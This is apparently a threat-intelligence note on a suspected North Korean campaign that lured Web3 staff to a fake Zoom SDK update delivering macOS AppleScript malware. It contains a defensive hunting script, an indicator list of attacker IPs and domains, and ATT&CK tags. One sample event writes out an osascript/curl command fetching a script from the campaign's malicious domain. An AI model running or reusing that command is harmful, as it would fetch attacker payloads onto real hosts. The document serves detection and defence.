North Korea Calling - Web3 Zoom Campaign

2025-04-23 Huntabil

https://huntability.tech/threat-note-2025-04-23-nk-zoom/


Huntabil.IT describes an April 2025 incident response case that exposed a likely North Korea-directed campaign against Web3 and cryptocurrency organizations. The operators impersonated a trusted Telegram contact, pushed the target through a Calendly booking to a fake Zoom SDK update, and delivered AppleScript from the typosquatted domain support.us05web-zoom.pro (imitating Zoom's legitimate usNNweb.zoom.us meeting hosts), tailored to macOS victims. The script reported host and process details to its C2, dropped Mach-O persistence components under ~/Library/DnsService, and pulled additional scripts that harvested browser, shell, and Telegram data. Huntabil.IT assessed the activity as targeted reconnaissance and initial data theft aimed at people involved in treasury operations, with the infrastructure appearing shortly before the attack.
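The chain above yields three host-side signals a hunter can key on: a Zoom-lookalike hostname in a process command line, osascript pulling content from the network, and execution from ~/Library/DnsService. The following is an added example (not Huntabil.IT's code) that encodes those signals as rules and runs them over constructed endpoint events. Only the domain support.us05web-zoom.pro and the DnsService path come from the report; the URL paths, file names, user name and event format are made up for the sample.

```python
"""Hunt rules for the macOS fake-Zoom-SDK tradecraft described above.

Added example, not code from Huntabil.IT. The events in SAMPLE_EVENTS are
constructed to look like endpoint telemetry; only the lookalike domain and
the ~/Library/DnsService path are taken from the report.
"""
import re
from urllib.parse import urlparse

# Zoom's real meeting/web hosts look like us05web.zoom.us. A hostname that
# borrows the "usNNweb" + "zoom" tokens but is not under zoom.us is the
# typosquat pattern used in this campaign (support.us05web-zoom.pro).
ZOOM_TOKEN = re.compile(r"us\d{2}web[-.]?zoom", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCH_RE = re.compile(r"\b(curl|nscurl)\b")
PERSIST_DIR = "/Library/DnsService/"   # dropped under ~/Library per the report


def is_zoom_lookalike(host):
    """True for hosts that imitate Zoom naming without being under zoom.us."""
    h = host.lower().rstrip(".")
    if h == "zoom.us" or h.endswith(".zoom.us"):
        return False
    return bool(ZOOM_TOKEN.search(h))


def extract_hosts(cmdline):
    """Pull hostnames out of any URLs embedded in a command line."""
    hosts = []
    for url in URL_RE.findall(cmdline):
        host = urlparse(url).hostname
        if host:
            hosts.append(host)
    return hosts


def evaluate(event):
    """Return the names of the rules a single event trips, in fixed order."""
    hits = []
    cmd = event.get("cmdline", "")
    exe = event.get("exe", "")
    if any(is_zoom_lookalike(h) for h in extract_hosts(cmd)):
        hits.append("zoom_lookalike_domain")
    # AppleScript stage reaching out for the next stage (osascript + curl).
    if event.get("process") == "osascript" and FETCH_RE.search(cmd):
        hits.append("osascript_fetches_remote")
    # Anything executing from, or referencing, the persistence directory.
    if PERSIST_DIR in exe or PERSIST_DIR in cmd:
        hits.append("dnsservice_persistence_path")
    return hits


def hunt(events):
    """Map event id -> tripped rules for every event that tripped at least one."""
    return {e["id"]: evaluate(e) for e in events if evaluate(e)}


# Constructed sample telemetry (paths and file names are hypothetical).
SAMPLE_EVENTS = [
    {
        "id": "ev1",
        "process": "osascript",
        "exe": "/usr/bin/osascript",
        "cmdline": "osascript -e 'do shell script \"curl -fsSL "
                   "https://support.us05web-zoom.pro/sdk-update.scpt -o /tmp/u.scpt\"'",
    },
    {   # benign: the real Zoom client joining a meeting on a genuine host
        "id": "ev2",
        "process": "zoom.us",
        "exe": "/Applications/zoom.us.app/Contents/MacOS/zoom.us",
        "cmdline": "zoom.us --url=https://us05web.zoom.us/j/123456789",
    },
    {   # a Mach-O launched from the persistence directory
        "id": "ev3",
        "process": "helper",
        "exe": "/Users/alice/Library/DnsService/helper",
        "cmdline": "/Users/alice/Library/DnsService/helper",
    },
]

if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(event_id, "->", ", ".join(rules))
```

The lookalike check deliberately whitelists only the zoom.us registrable domain rather than trusting anything containing "zoom", which is exactly what the typosquat relies on; feed it the hostnames from your proxy or EDR command-line fields rather than from DNS alone, since the AppleScript stage may resolve through a different path than the browser.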

Indicators of Compromise

Type    Value                                 First Seen  Last Seen
IPv4    192.119.116.231                       2025-04-23  2025-12-17
IPv4    104.168.151.116                       2025-04-23  2025-12-17
IPv4    192.236.146.22                        2025-04-23  2025-12-17
URL     https://writeup.live/test             2025-04-23  2025-10-28
URL     https://safeup.store/test             2025-04-23  2025-10-28
DOMAIN  safeup.store                          2025-04-23  2025-10-28
DOMAIN  dataupload.store                      2025-04-23  2025-10-28
DOMAIN  writeup.live                          2025-04-23  2025-10-28
HASH    41660a23e5db77597994e17f9f773d0…      2025-04-23  2025-07-14
HASH    469fd8a280e89a6edd0d704d0be4c7e…      2025-04-23  2025-07-14
IPv4    23.254.247.53                         2025-04-23  2025-06-20
HASH    803d5db6296a5829b168ae45087356f…      2025-04-23  2025-04-23
HASH    5fe5b1d879251d1618e275099cc6363…      2025-04-23  2025-04-23
URL     https://dataupload.store/             2025-04-23  2025-04-23
URL     https://support.us05web-zoom.pr…      2025-04-23  2025-04-23
DOMAIN  support.us05web-zoom.pro              2025-04-23  2025-04-23
IPv4    192.236.198.31                        2025-04-23  2025-04-23
IPv4    142.11.241.62                         2025-04-23  2025-04-23

Related Reports

2025-02-12 • 35% Match
#APT43 #T1102.002 #T1082 #T1059.003 #T1567.002 #T1140 #T1005 #T1070.004 #T1587.001 #T1041 #T1608.001 #T1071.001 #T1112 #T1083 #T1056.001 #T1059.006 #T1204.001 #T1059.007 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1057 #T1059.005 #T1583.006 #T1518.001 #T1566.001 #T1547.001 #T1585.002 #T1053.005 #T1598.003 #T1583.001 #T1059.001 #T1036.005 #T1552.001 #T1585.001 #T1105 #T1219 #T1055 #T1553.002 #T1562.001 #T1027.002 #T1133 #T1190 #T1098 #T1016 #T1074.001 #T1588.002 #T1055.012 #T1587 #T1078.003 #T1071.002 #T1562.004 #T1550.002 #T1111 #T1071.003 #T1591 #T1003.001 #T1218.011 #T1593.002 #T1586.002 #T1588.005 #T1583.004 #T1036.004 #T1589.003 #T1594 #T1218.010 #T1557 #T1593.001 #T1218.005 #T1589.002 #T1584.001 #T1070.006 #T1021.001 #T1560.001 #T1176 #T1136.001 #T1543.003 #T1012 #T1534 #T1560.003 #T1007 #T1564.003 #T1114.003 #T1114.002 #T1564.002 #T1040 #T1546.001 #T1505.003
Shares tags: T1082, T1005, T1041
2024-07-19 • 32% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: T1082, T1005, T1041